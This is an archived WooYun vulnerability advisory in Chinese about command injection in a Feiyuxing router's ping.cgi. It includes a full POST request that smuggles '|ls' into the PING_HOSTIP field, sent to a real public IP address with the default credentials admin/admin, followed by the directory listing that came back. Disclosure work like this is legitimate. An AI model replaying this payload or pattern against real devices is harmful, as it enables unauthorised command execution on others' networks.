当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039759

漏洞标题:飞鱼星上网行为管理路由器命令执行漏洞

相关厂商:飞鱼星

漏洞作者: 想要减肥的胖纸

提交时间:2013-10-15 09:04

修复时间:2014-01-13 09:04

公开时间:2014-01-13 09:04

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-15: 细节已通知厂商并且等待厂商处理中
2013-10-19: 厂商已经确认,细节仅向厂商公开
2013-10-22: 细节向第三方安全合作伙伴开放
2013-12-13: 细节向核心白帽子及相关领域专家公开
2013-12-23: 细节向普通白帽子公开
2014-01-02: 细节向实习白帽子公开
2014-01-13: 细节向公众公开

简要描述:

飞鱼星上网行为管理路由器存在命令执行漏洞

详细说明:

http://222.74.37.246/ping.cgi
用户密码 admin/admin

POST /ping.cgi HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/msword, */*
Referer: http://222.74.37.246/ping.cgi
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 222.74.37.246
Content-Length: 94
Connection: Keep-Alive
Pragma: no-cache
ENABLE_EXTERNAL_PING=YES&PING_HOSTIP=baidu.com|ls&PING_COUNT=3&LANGUAGE=&OKBTN=%E5%BC%80%E5%A7%8B


English 简体中文 繁體中文
VE1260G[Beta 1023]
  Ping  Tracert  
  
  1 2 3 4 5 6 7 8 9 10 
    
agent.cgi  
analyze.cgi  
app_attemper.cgi  
app_attemper_edit.cgi  
appfunction.cgi  
appfunction_edit.cgi  
arp.cgi  
backup-restore.cgi  
certifiadd.cgi  
certifistart.cgi  
chinese.js  
chinese_complex.js  
chinese_complexhl.js  
chinesehl.js  
conn_limit.cgi  
conn_limit_edit.cgi  
css  
dhcplist.cgi  
diag.cgi  
dnscache.cgi  
dnscache_edit.cgi  
dyndns.cgi  
dyndns_edit.cgi  
english.js  
englishhl.js  
errors  
firewall.cgi  
firewall_edit.cgi  
flux_adv_edit.cgi  
flux_capacity_edit.cgi  
flux_detail_edit.cgi  
flux_limit.cgi  
flux_limit_edit.cgi  
flux_q3userapp_edit.cgi  
fw.cgi  
fw_edit.cgi  
game.cgi  
groupip.cgi  
groupip_edit.cgi  
groupipname.cgi  
groupipname_edit.cgi  
grouptime.cgi  
grouptime_edit.cgi  
help.tpl  
htmlgame.cgi  
httpsec.cgi  
identityreg.cgi  
ifac.cgi  
im.cgi  
images  
index.cgi  
interface_status.cgi  
ipauth.cgi  
ipmac.cgi  
ipmac_edit.cgi  
ipsec.cgi  
ipsec_edit.cgi  
ipsecnode.cgi  
joint_punish.cgi  
js  
l2tp_mode.cgi  
l2tp_vpn.cgi  
l2tp_vpn_edit.cgi  
l2tpipsec.cgi  
l2tpipsec_user_edit.cgi  
lanconf.cgi  
lanconf_edit.cgi  
lanconfitem.cgi  
license.cgi  
linka_applyprio.cgi  
linka_applyprio_edit.cgi  
linka_arpdefens.cgi  
linka_arpdefens_edit.cgi  
linka_arpdefens_limit.cgi  
linka_bufpolicy.cgi  
linka_cabletest.cgi  
linka_cascadeport.cgi  
linka_cfghandle.cgi  
linka_joint_punish.cgi  
linka_manage.cgi  
linka_netdev_protect.cgi  
linka_port.cgi  
linka_port_edit.cgi  
linka_portmap.cgi  
linka_portprio.cgi  
linka_portprio_edit.cgi  
linka_pstatistic.cgi  
linka_pve.cgi  
linka_pve_edit.cgi  
linka_pvlan.cgi  
linka_pvlan_edit.cgi  
linka_queschedule.cgi  
linka_queschedule_edit.cgi  
linka_rstp.cgi  
linka_rstp_edit.cgi  
linka_system.cgi  
linka_systemup.cgi  
linka_trunk.cgi  
linka_trunk_edit.cgi  
linka_trustmodel.cgi  
linka_trustmodel_edit.cgi  
linka_tvlan.cgi  
linka_tvlan_edit.cgi  
linka_virusfl.cgi  
linka_virusfl_edit.cgi  
linkage_devmanage.cgi  
linkage_register.cgi  
log.js  
mac_filt.cgi  
mac_filt_edit.cgi  
macauth.cgi  
macauth_edit.cgi  
man.cgi  
man_edit.cgi  
menu.tpl  
murl.cgi  
nat_1to1.cgi  
nat_1to1_edit.cgi  
nat_out.cgi  
nat_out_edit.cgi  
net_protect.cgi  
netconfig.cgi  
netsafe.cgi  
notic.cgi  
npnp.cgi  
npnp_edit.cgi  
nqos.cgi  
nqos_edit.cgi  
nqos_ltedit.cgi  
num.cgi  
p2p.cgi  
password.cgi  
ping.cgi  
policy.cgi  
policy_edit.cgi  
port_manage.cgi  
portfw.cgi  
portfw_edit.cgi  
pppoes.cgi  
pppoes_edit.cgi  
pppoes_mc.cgi  
pptp.cgi  
pptp_user_edit.cgi  
pptpc.cgi  
qq_edit.cgi  
qqmanage.cgi  
qqmanage_edit.cgi  
reboot.cgi  
remote_user.cgi  
remote_user_edit.cgi  
restore_conf.cgi  
route.cgi  
route_edit.cgi  
scan_packet.cgi  
share_net.cgi  
smtp.cgi  
sniff.cgi  
snmpclient.cgi  
speed.cgi  
stat.cgi  
stat2.cgi  
stat3.cgi  
stat4.cgi  
stat5.cgi  
stat6.cgi  
stat7.cgi  
static_dhcp.cgi  
static_dhcp_edit.cgi  
static_dhcppool_edit.cgi  
stock.cgi  
super_manage.cgi  
svpn.cgi  
svpn_tunnel.cgi  
svpn_tunnel_edit.cgi  
syslog.cgi  
system.cgi  
system_status.cgi  
total.cgi  
tr069client.cgi  
up.cgi  
upadpage.cgi  
upadpageapp.cgi  
upblockpage.cgi  
upblockpageapp.cgi  
update.cgi  
updateconf.cgi  
updresult.cgi  
upload.cgi  
upnp.cgi  
upnpe.cgi  
upnpe_edit.cgi  
upnpedit.cgi  
uppppoespage.cgi  
upstrategy.cgi  
upwebcertifiimage.cgi  
usb_3g.cgi  
usb_3g_speed.cgi  
usb_download.cgi  
usb_printer.cgi  
usb_status.cgi  
usb_storage.cgi  
usb_upnp.cgi  
vh_family.cgi  
vh_fmweb.cgi  
virus.cgi  
vlan.cgi  
wan.cgi  
wan_speed.cgi  
wan_speed_test.cgi  
wancontrol.cgi  
wanmode.cgi  
warn.cgi  
webcertifi.cgi  
webipauth.cgi  
webmacauth.cgi  
webmacauth_edit.cgi  
weboption.cgi  
webserver  
webuser.cgi  
wishfi.cgi  
wizard.cgi  
wl_advance.cgi  
wl_base.cgi  
wl_guest.cgi  
wl_mac.cgi  
wl_mac_edit.cgi  
wl_security.cgi  
wl_status.cgi  
wl_vssid.cgi  
wl_vssid_edit.cgi  
wl_wds.cgi  
wl_wds_apscan.cgi  
wl_wps.cgi  
wolgroup.cgi  
wolgroup_edit.cgi  
 
Copyright ©

漏洞证明:

QQ20131015-29@2x.png

修复方案:

版权声明:转载请注明来源 想要减肥的胖纸@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-10-19 21:09

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2013-10-15 09:11 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    必须mark啊

  2. 2013-10-15 09:12 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    必须mark

  3. 2013-10-15 11:39 | HuGtion ( 实习白帽子 | Rank:70 漏洞数:10 | 学习安全技术。)

    mark

  4. 2013-11-28 21:20 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    楼主厉害,这都让你发现了。

  5. 2013-11-29 17:29 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    @hacker@sina.cn 连QB奖励都没。唉。

  6. 2014-11-17 16:46 | 糖剩七颗 ( 普通白帽子 | Rank:430 漏洞数:61 | 天涯何处无屌丝)

    需要登陆到管理平台才能执行吗